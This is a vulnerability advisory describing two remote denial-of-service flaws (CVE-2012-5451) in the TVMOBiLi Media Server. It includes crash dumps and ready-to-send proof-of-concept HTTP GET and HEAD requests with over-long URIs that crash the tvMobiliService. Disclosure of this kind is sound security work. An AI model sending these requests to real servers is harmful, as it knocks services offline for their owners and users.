TVMOBiLi Media Server Multiple Remote DoS Vulnerabilities

High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.

1. Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451
   1.1 The vulnerability exists due to improper handling of URI length within the “HttpUtils.dll” dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port (default TVMOBiLi’s server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.
   Crash details
   MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000
   CONTEXT DUMP
   EIP: 78abe2ad mov [edx],al
   EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
   EBX: 00000019 ( 25) -> N/A
   ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
   EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx’(x(x0kxxT$|$| (stack)
   EBP: 00b8f61c ( 12121628) -> sx xx’(x(x0kxxT$|$| (stack)
   ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx’ (stack)
   +00: 78abe2ff (2024530687) -> N/A
   +04: 00000000 ( 0) -> N/A
   +08: 0000011f ( 287) -> N/A
   +0c: 00000002 ( 2) -> N/A
   +10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A
   disasm around:
   0x78abe28e jnc 0x78abe2f9
   0x78abe290 outsb
   0x78abe292 and fs:[eax],al
   0x78abe296 test byte [ecx+0xc],0x40

Proof of Concept
The following HTTP GET request will crash vulnerable tvMobiliService service remotely:
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: /
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None

1.2 The vulnerability exists due to improper handling of URI length within the “HttpUtils.dll” dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to 30888/TCP port and cause a stack-based buffer overrun that will crash tvMobiliService service.
Crash details
MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000
CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx’(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx’(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx’ (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A
disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40

Proof of Concept
The following HTTP HEAD request will crash vulnerable tvMobiliService service remotely:
HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: /
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None